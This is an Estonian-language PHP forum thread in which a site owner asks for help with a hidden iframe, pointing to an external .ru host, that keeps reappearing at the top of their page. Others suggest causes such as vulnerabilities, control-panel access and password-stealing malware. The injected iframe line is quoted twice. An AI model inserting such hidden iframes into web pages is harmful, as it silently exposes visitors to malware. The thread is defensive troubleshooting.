PHP.EE FOORUM   
Nimi:   Pass:   Mäleta mind! 
   Teemad | php.ee esilehele | registreeri | Märgi kõik teemad loetuks | #php.ee Skype vestlus | RSS
UUS TEEMA  OTSI  Lehekülgi: 1
Viirus kodulehel
Postitaja: raunom 2009-08-08 11:18:12
Tere,

Keegi või miski sokutab minu kodulehe koodi alla igasugust rämpsu. Ilmselt on tegemist mingi viiruseussiga.

Kohe <body> algusesse oli tekkinud järgmine iframe.

<iframe src="http://x6r.ru:8080/index.php" width=156 height=158 style="visibility: hidden"></iframe>

Huvitav, kuidas see võimalik on? Kas see tuleb siis FTP kaudu? FTP paroolid on üsna tugevad ja kaitstud...

Edit: see tuleb aina uuesti ja uuesti, olgugi, et kõik FTP paroolid ära muutnud oleme - korduvalt.

Viimati muudetud: 08-08-2009 11:18:50
Muutja: raunom
Põhjus:

RE: Viirus kodulehel
Postitaja: rtfm 2009-08-08 11:37:43
TSITEERITUD:
Tere,

Keegi või miski sokutab minu kodulehe koodi alla igasugust rämpsu. Ilmselt on tegemist mingi viiruseussiga.

Kohe <body> algusesse oli tekkinud järgmine iframe.

<iframe src="http://x6r.ru:8080/index.php" width=156 height=158 style="visibility: hidden"></iframe>

Huvitav, kuidas see võimalik on? Kas see tuleb siis FTP kaudu? FTP paroolid on üsna tugevad ja kaitstud...

Edit: see tuleb aina uuesti ja uuesti, olgugi, et kõik FTP paroolid ära muutnud oleme - korduvalt.


siis on kodulehel turvaauk mis lubab failisüsteemi, baasi jne kohtadese sitta injectida
RE: Viirus kodulehel
Postitaja: blaa 2009-08-08 12:30:26
ütle lehe aadress, ehk saame aidata
RE: Viirus kodulehel
Postitaja: Kaak 2009-08-08 12:47:05
TSITEERITUD:
ütle lehe aadress, ehk saame aidata

Ja et abi täielikum oleks, siis oma FTP barjolid võid ka siis kirja panna.
RE: Viirus kodulehel
Postitaja: Mesilane6 2015-10-21 19:01:11
Infot leiad siit: <a href="http://www.webberry.eu/viiruse-likvideerimine/">Viiruse likvideerimine</a>
RE: Viirus kodulehel
Postitaja: asd 2015-10-21 19:11:18
noh, ega tavaline ftp pole ainuke viis, et lehel muudatused teha, n'iteks sul on kindlasti ka mingi directadmin või cpanel olemas...
ka sealt pääseb..
vaata logisid
RE: Viirus kodulehel
Postitaja: asd 2015-10-21 19:18:40
lisaks ka sinu arvutis võib olla mingi pahavara, mis loeb paroole...
RE: Viirus kodulehel
Postitaja: blaa 2015-10-22 17:21:40
Ma arvan, et kuue aasta jooksul on see veebileht ammu kadunud juba.
RE: Viirus kodulehel
Postitaja: C4 2015-12-12 03:07:39
Teemaalgataja kadunud, aga sest pole midagi, arutleda võib ikka.
Avastasin, et zones jooksevad php scriptid kasutaja õigustes, mis tähendab, et ühe vigase scripti olemasolul on võimalik kogu serveri sisu üle kirjutada.
nobody õigustes php jooksutamine oleks nagu turvalisem?

Leheküljed: 1

©2002-2013 Martin Rebane & PHP.ee kaasautorid
  0.0823550224304